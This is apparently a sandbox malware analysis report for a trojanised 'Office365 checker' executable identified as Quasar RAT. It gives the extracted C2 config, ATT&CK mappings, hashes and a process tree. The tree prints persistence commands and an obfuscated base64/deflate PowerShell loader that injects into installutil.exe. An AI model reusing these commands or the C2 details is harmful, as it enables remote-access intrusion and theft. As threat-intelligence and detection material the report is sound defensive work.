quasar | 06f18c05b6a52cea7751c0ee3fbec0f8977b0689f879899c04ac83c8f7612621

Analysis

max time kernel
32s
max time network
34s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
08-06-2024 17:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OFFICE365 CHECKER FAST PROXYLESS.exe
Size

12.3MB
MD5

9f52957212a1b9b485fc6d92c5722db8
SHA1

fa7abe5bb5aca80538373cb9e4c7ec6e2d097a16
SHA256

06f18c05b6a52cea7751c0ee3fbec0f8977b0689f879899c04ac83c8f7612621
SHA512

52b895cd8d2fe97482831b38da0e5e81fd2fac0659d6546566547f5cf70a1083992418366d819fc9f4781b8f77cf57d3a9ad05805ea07a69c444cd6cb6728fc6
SSDEEP

196608:LfPkFVno6+uXJWIj8KkUx2R4NzHdQmR5dA6lRuErSEEJwdF6sxw1yYPU1kspt1J:LHEVFJWQsUcR4NzHdQ2lR+9JUiylHD

Score

10^/10

quasar bec execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0.0

Botnet

BEC

185.238.3.205:6669

Mutex

hW41R9L0FJ9nhlusTK

Attributes

encryption_key
cC6WLAHAW6Ww5yQZ4wDX
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4344-126-0x0000000000400000-0x000000000044E000-memory.dmp	family_quasar

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

26 2272 powershell.exe

flow	pid	process
26	2272	powershell.exe

Loads dropped DLL 18 IoCs

Processes:

OFFICE365 CHECKER FAST PROXYLESS.exe

pid	process
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe
4788	OFFICE365 CHECKER FAST PROXYLESS.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

14 ifconfig.me
18 ifconfig.me
29 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2272 set thread context of 4344 2272 powershell.exe installutil.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4868 powershell.exe
2272 powershell.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3056 2272 WerFault.exe powershell.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4832 schtasks.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

4868 powershell.exe
4868 powershell.exe
4868 powershell.exe
4868 powershell.exe
2272 powershell.exe
2272 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exeinstallutil.exe

description pid process

Token: SeDebugPrivilege 4868 powershell.exe
Token: SeDebugPrivilege 2272 powershell.exe
Token: SeDebugPrivilege 4344 installutil.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

installutil.exe

pid process

4344 installutil.exe

flow	ioc
14	ifconfig.me
18	ifconfig.me
29	ip-api.com

description	pid	process	target process
PID 2272 set thread context of 4344	2272	powershell.exe	installutil.exe

pid	process
4868	powershell.exe
2272	powershell.exe

pid	pid_target	process	target process
3056	2272	WerFault.exe	powershell.exe

pid	process
4832	schtasks.exe

pid	process
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
2272	powershell.exe
2272	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	4344	installutil.exe

pid	process
4344	installutil.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

OFFICE365 CHECKER FAST PROXYLESS.exeOFFICE365 CHECKER FAST PROXYLESS.execmd.execmd.execmd.execmd.exepowershell.execsc.exe

description	pid	process	target process
PID 2868 wrote to memory of 4788	2868	OFFICE365 CHECKER FAST PROXYLESS.exe	OFFICE365 CHECKER FAST PROXYLESS.exe
PID 2868 wrote to memory of 4788	2868	OFFICE365 CHECKER FAST PROXYLESS.exe	OFFICE365 CHECKER FAST PROXYLESS.exe
PID 4788 wrote to memory of 2816	4788	OFFICE365 CHECKER FAST PROXYLESS.exe	cmd.exe
PID 4788 wrote to memory of 2816	4788	OFFICE365 CHECKER FAST PROXYLESS.exe	cmd.exe
PID 2816 wrote to memory of 4800	2816	cmd.exe	attrib.exe
PID 2816 wrote to memory of 4800	2816	cmd.exe	attrib.exe
PID 4788 wrote to memory of 3540	4788	OFFICE365 CHECKER FAST PROXYLESS.exe	cmd.exe
PID 4788 wrote to memory of 3540	4788	OFFICE365 CHECKER FAST PROXYLESS.exe	cmd.exe
PID 3540 wrote to memory of 4832	3540	cmd.exe	schtasks.exe
PID 3540 wrote to memory of 4832	3540	cmd.exe	schtasks.exe
PID 4788 wrote to memory of 3552	4788	OFFICE365 CHECKER FAST PROXYLESS.exe	cmd.exe
PID 4788 wrote to memory of 3552	4788	OFFICE365 CHECKER FAST PROXYLESS.exe	cmd.exe
PID 3552 wrote to memory of 4636	3552	cmd.exe	cmd.exe
PID 3552 wrote to memory of 4636	3552	cmd.exe	cmd.exe
PID 4788 wrote to memory of 1436	4788	OFFICE365 CHECKER FAST PROXYLESS.exe	cmd.exe
PID 4788 wrote to memory of 1436	4788	OFFICE365 CHECKER FAST PROXYLESS.exe	cmd.exe
PID 3552 wrote to memory of 4868	3552	cmd.exe	powershell.exe
PID 3552 wrote to memory of 4868	3552	cmd.exe	powershell.exe
PID 1436 wrote to memory of 2272	1436	cmd.exe	powershell.exe
PID 1436 wrote to memory of 2272	1436	cmd.exe	powershell.exe
PID 1436 wrote to memory of 2272	1436	cmd.exe	powershell.exe
PID 2272 wrote to memory of 4404	2272	powershell.exe	csc.exe
PID 2272 wrote to memory of 4404	2272	powershell.exe	csc.exe
PID 2272 wrote to memory of 4404	2272	powershell.exe	csc.exe
PID 4404 wrote to memory of 4764	4404	csc.exe	cvtres.exe
PID 4404 wrote to memory of 4764	4404	csc.exe	cvtres.exe
PID 4404 wrote to memory of 4764	4404	csc.exe	cvtres.exe
PID 2272 wrote to memory of 4344	2272	powershell.exe	installutil.exe
PID 2272 wrote to memory of 4344	2272	powershell.exe	installutil.exe
PID 2272 wrote to memory of 4344	2272	powershell.exe	installutil.exe
PID 2272 wrote to memory of 4344	2272	powershell.exe	installutil.exe
PID 2272 wrote to memory of 4344	2272	powershell.exe	installutil.exe
PID 2272 wrote to memory of 4344	2272	powershell.exe	installutil.exe
PID 2272 wrote to memory of 4344	2272	powershell.exe	installutil.exe
PID 2272 wrote to memory of 4344	2272	powershell.exe	installutil.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4800 attrib.exe

pid	process
4800	attrib.exe

C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe
"C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2868

C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe
"C:\Users\Admin\AppData\Local\Temp\OFFICE365 CHECKER FAST PROXYLESS.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs""
3⤵
- Suspicious use of WriteProcessMemory
PID:2816

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"
4⤵
- Views/modifies file attributes
PID:4800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs" > NUL 2>&1"
3⤵
- Suspicious use of WriteProcessMemory
PID:3540

C:\Windows\system32\schtasks.exe
schtasks /create /tn WindowsAPIwsh /sc hourly /mo 1 /tr "C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs"
4⤵
- Creates scheduled task(s)
PID:4832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd /C echo Y|powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
3⤵
- Suspicious use of WriteProcessMemory
PID:3552

C:\Windows\system32\cmd.exe
cmd /C echo Y
4⤵
PID:4636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ExecutionPolicy Unrestricted -Scope CurrentUser
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "& ( $sHEllid[1]+$sHeLLID[13]+'X') ( NEW-objeCt sySTEM.IO.comPRESSiOn.DEFLAtEsTREAm([IO.memorYsTREAm] [SYsTEM.CoNvERT]::FROMBaSe64StrINg('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' ),[sySteM.IO.cOmpReSSIoN.COMprEssIOnMode]::DECoMprEss)|FoREach-ObJEct{NEW-objeCt SYsTeM.io.sTreamReader( $_ ,[texT.eNcodiNg]::ASciI) }|fOReach-ObJECt{ $_.ReadTOEND( ) } )""
3⤵
- Suspicious use of WriteProcessMemory
PID:1436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "& ( $sHEllid[1]+$sHeLLID[13]+'X') ( NEW-objeCt sySTEM.IO.comPRESSiOn.DEFLAtEsTREAm([IO.memorYsTREAm] [SYsTEM.CoNvERT]::FROMBaSe64StrINg('zRr7T+M4+nck/gdvtatNj06H1yE03Upb2hxUgga1neHuEIvSxKVZUifrOEB3mP/9Ptt5OXFauJ1KGyHaOP7eT3/pj07UD1yMuujXn3d34sgjD2iyihhedtTbdj/wfewwLyBR+xwTTD2numUZBgQTdgUo/fLToVVeufTIH+W1cUyYt8TtIWGYBuEE0yfPwVF52xS/sPLaCPOl3R1iL3EU2g5GDEcspB5huztfd3cQXGE88z0HOb4dRWiCGQP4SD76ymFRct0OfH8I0lBmNB4xJdg/Omy7vt9ocahLO2ImpQEFvTEa4+ZdDgn0nmyGUcRsBpSATwBHIM41o+iLR1ls+z3fDxzzxUhWQxqAiFEr3WW7LhX3wDmKvD9xC8X8q83BbG6C6SpMF+f+NQ0YWKbZ2R77syDwUZ9ieHItmTUiRrnu7TAcgb5bKLl3lm4mR4SdHoPlWbbCFoDDTRcFVo8swJfYhU1cH0eJUA4nBXL+y7cfogw3Jk8eDcgSPCxb291xYkphZeBRUEJAVzl5ZoO2wyGZB9laomq+tnV93YBYqbqu8BJYSw2+4KuKuUEZK4Zv75BrM7to+CBm4u4ZkDFMtsn0U+C5aIrp0iMFOxdZFk4pDIRfPMYTxzb54XTGOIqXeCrcJmNF3m7dfueYSUr9AJLRCyvRz+znyMdb52fyN+PnJng+Of67KUkw9Z00RRhw85c5GrHPZGmHXzz8bM0nsoRWoypd6EEy2HqQj5n/X6iualJairs892xNK4KFEZOhXZNmtu4nw0h4Sm2W43lXbLz3lJ2ca194TE4G3ChiMi/2x2Zvat6PzJv7vjWaWJcmsLX/si+ug/3OJqDrsdU3J5P787H1+ToHPdzfAGrd3wxHA+tGgpxKemtBJp8n1+ZoYA4KDO4frwX5PBr2rYF5b46+DMfW6MocTXPg4zp6A3Pa61+Yg1S2Ir1TPcjIGl/1LgFgaI2H0//c9y97CtxhDamL4flFPdRpDVTvzPrCVbiO5mmtOkE1l9PhlVlL96AOcji4rIcCfRagkrY18eOk9YHUO8Z/xNDjps1YTP1mDvQ1/5o8h64SGvSIt/typW0uQ7ZSnJnRlRYFv2S7bdzgWd/3MO/T5EcXEfyMsmWj2VThSmj4VWBFImkPgmfiB7Y7EZwZXJaOCvctvy18hY7YWSDDfHFwyHMrhLleCfyCghAFPm6L3gzOH9hoyOQROKKPdJEbS+WaU+BRaPcTaqA9wNq+gvi3H5TE+K2oOopZDPklFa2jZVc1pciFJCDwF6RWXARR3t86wXLJW2NgNesRQ3vFFVUvpejQ7v25zc3SRVc2jRa23x5D7YNEd3RoJBha4G1HTlnN0QJSrSgB1twSKrX9CwDFtIrr4CTHlVHcA7QHx3q0JF7OMM0KYfQOlCdljGmlsubDJdhlvaQKqn/u1+OSomoYq8dWkZVjS89qmaw54pKm4IOTDuYGwDWTu7LuNRQ8LvWZHb1H8iMtr8mJ05qbBOI/DDwR1G/FeXiq1sMUa3Jm4UmtRDOprMuT45nHKcny256A3Ogf6BR1u+jkWA8jqzHAzG1fxJi6S3PQjBkuWlMcvi/O/WBm+8b+y3FFIdWjYj30wX5VdLW7KnPCY65KU4UpkObbdUSENhayGwH21LM5iX2/leSRRLUce+lGKLBVTc36Sviq621e63uX10qjUaXUQpJT+b+qqdJpvcbWadNW9Vh4atSc+Ivw8lSwERx8Pd0wEQFqsFXIo1ZubTY1UTBHxg+plV5fC6x2i7YQj1IulCfVQqorpbzs1NdKIara7qp9bhpUVf61Z5ccOJU8S0RVDNm5Rs6usDsRk7lueRS2BmmrmORFyYL2SIRRNYuDviukqqqu7kiJGh8OmrotP3Q1wm5scirDlFzKCuv8ShsBGblK6U9rvgaqzv5lU2jmUWu1niV7pS5KlymMo1Qic+ilDFGcRNqHj18qNR9W9/Y2ay+fIubVsz4TyyJUxqHmVQVVq6Zy8Sul0Q/CVV70aiv6HogMdUvga6E3U+Fqok+2ttJWkJyKUlspHBke+5mb6T24tApLcCUNwXvQVfrIFN2TjPR3sKdXV2FCmpw4xEoi+Z0W5iyezzFtn4HpHlVj5kK2kqHrfivVok6S90UPaAQsm2JO0FZCp4j/29pOJhlkrXF/p6L/tT1Fsl+FSHELWaVxFPKyGYEj7Uxf6rJCsjG29bPDbD6nUF1zDOQXhi5mI73vQ0qcq2YvWi+uKMrW1NPEhcF3h4Xe/YzP0skTpgxcFTg9g12RoRRVRXdv8UTO5h46bSm0RNHckMA3+YCI9RnEStHXNeeH7+IhlUHu9jzk/ydV9ZGQ4icviKNJHIWYAGgszlPKywzNW4xUSXrwLoLeZKMYwGzwLMcxHjk6zKYiRmrXczkylU/56MNovm3OohlceOR3nrvJg3EmHft602Qi7XCubbbg74tnfASTvPM189d7nMtkNXuvZ0BpbXgE6Pt+zDy/jV9wg681WhldxedqeU+i8N/WeIAdcFehn+wdo1jB7lSEcbL6iFfrpy0cZWpmBUX7EpMHtkAf0WlHmwtcnOwWUV8sbBnOuxKkrsfKNr+xuUoEA/3bdNVfxOSxwvkknsldormBVKJtGDjhHJALwY+jMp21pwFfMApUWuhQh0XVwq13B0gMjrppqLh/47a49dBP/DNR7t2G+E/mciqNN0/npJMb9fZPVPknngHThaFsY8FY+OnjR/4rBN7Ri98lYAqKabux8+iSqB3Qh49nZr/9e/jQ0M1Q0vBSXRUogds7gYtnUP4bSvwmfb9cgBv4+/nXTqfnuh/4jwaQ+D/Ac494Ylj6Y/IDkA+XNnmI+RStP1nYNOx0brNfT7TTH0rcffqUauN/' ),[sySteM.IO.cOmpReSSIoN.COMprEssIOnMode]::DECoMprEss)|FoREach-ObJEct{NEW-objeCt SYsTeM.io.sTreamReader( $_ ,[texT.eNcodiNg]::ASciI) }|fOReach-ObJECt{ $_.ReadTOEND( ) } )"
4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2272

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oikjrjhe\oikjrjhe.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:4404

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9EC.tmp" "c:\Users\Admin\AppData\Local\Temp\oikjrjhe\CSCC888C55530274DE68E10821A87175D4.TMP"
6⤵
PID:4764

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 2120
5⤵
- Program crash
PID:3056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2272 -ip 2272
1⤵
PID:1364

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA9EC.tmp
Filesize
1KB

MD5
83ef8828e60d655faff3aa1acf4f8f24

SHA1
0cb552c79236598af78da5406e205d264dffac32

SHA256
45425fada4df437c58fca9b37d891d3d4f6ec956ba6234606076270de230774c

SHA512
55b4082e67ebe2bb1222b8e8e94fc12893a065557957ec5a64506b220ad2b5dad55cc16af495e48441e2d48bf7b34fdc71a75e90bccdd9be8dbcba6d52c9ca4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\VCRUNTIME140.dll
Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_bz2.pyd
Filesize
81KB

MD5
10d42efac304861ad19821b4594fa959

SHA1
1a65f60bba991bc7e9322af1e19f193dae76d77a

SHA256
8eecdcc250637652e6babc306ea6b8820e9e835ddd2434816d0e0fd0ca67fd14

SHA512
3f16dba627a133586e9d1c16d383b9461424d31892278ab984f7e6932a1cdc51445e1bec017a665bd66c0f2a9ba417387fecc5fdede36d67f8343b82a2ceb9ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_ctypes.pyd
Filesize
120KB

MD5
df6be515e183a0e4dbe9cdda17836664

SHA1
a5e8796189631c1aaca6b1c40bc5a23eb20b85db

SHA256
af598ae52ddc6869f24d36a483b77988385a5bbbf4618b2e2630d89d10a107ee

SHA512
b3f23530de7386cc4dcf6ad39141240e56d36322e3d4041e40d69d80dd529d1f8ef5f65b55cdca9641e378603b5252acfe5d50f39f0c6032fd4c307f73ef9253

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_hashlib.pyd
Filesize
62KB

MD5
f419ac6e11b4138eea1fe8c86689076a

SHA1
886cda33fa3a4c232caa0fa048a08380971e8939

SHA256
441d32922122e59f75a728cc818f8e50613866a6c3dec627098e6cc6c53624e2

SHA512
6b5aa5f5fbc00fb48f49b441801ee3f3214bd07382444569f089efb02a93ce907f6f4e0df281bda81c80f2d6a247b0adc7c2384a2e484bc7ef43b43c84756d2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_lzma.pyd
Filesize
153KB

MD5
3230404a7191c6228a8772d3610e49e5

SHA1
4e8e36c89b4ff440ddff9a5b084b262c9b2394ec

SHA256
33ae42f744d2688bb7d5519f32ff7b7489b96f4eea47f66d2009dba6a0023903

SHA512
6ecce0c8e8b3d42275d486e8ff495e81e36adaaacaaa3db37844e204fcdaa6d89cb3d81c43d9e16d938cd8b6671b8800fe74a1e723a9187b0566a8f3c39d5d5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_queue.pyd
Filesize
30KB

MD5
045ef55136b1e580582199b3399267a2

SHA1
de54519c67a996d0a8b4164417058f4610a57376

SHA256
39bd456267fe228a505ef4e9c8d28f948dd65123cb4d48b77da51910013fa582

SHA512
7b764fdc92bf10eb05bdd4116a549de67f0fa92f807d8b0eca9d718361c546dbec16ea68ef8ddec1c417530c6eb234c657e45f8c522852ab1bd7cb21976dad1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_socket.pyd
Filesize
76KB

MD5
0fc65ec300553d8070e6b44b9b23b8c0

SHA1
f8db6af578cf417cfcddb2ed798c571c1abd878f

SHA256
360744663fce8dec252abbda1168f470244fdb6da5740bb7ab3171e19106e63c

SHA512
cba375a815db973b4e8babda951d1a4ca90a976e9806e9a62520a0729937d25de8e600e79a7a638d77df7f47001d8f884e88ee4497bd1e05c1dae6fa67fb3dd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_ssl.pyd
Filesize
155KB

MD5
93905020f4158c5119d16ee6792f8057

SHA1
eb613c31f26ed6d80681815193ffafdf30314a07

SHA256
d9cc4358d9351fed11eec03753a8fa8ed981a6c2246bbd7cb0b0a3472c09fdc4

SHA512
0de43b4fafdd39eaaff6cab613708d56b697c0c17505e4132d652fb3f878c2114f5e682745a41219193c75e783aede524685b77bd31620f8afe9c7b250f92609

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\_uuid.pyd
Filesize
23KB

MD5
13cc10d148b921f68e218dd912cc6ee4

SHA1
930cef88b581fb4d1b88fbdbaf64d34efa582f90

SHA256
d17e20063243a71b4331c7a8902451c6911fd87475ec918633c6388d6155ce52

SHA512
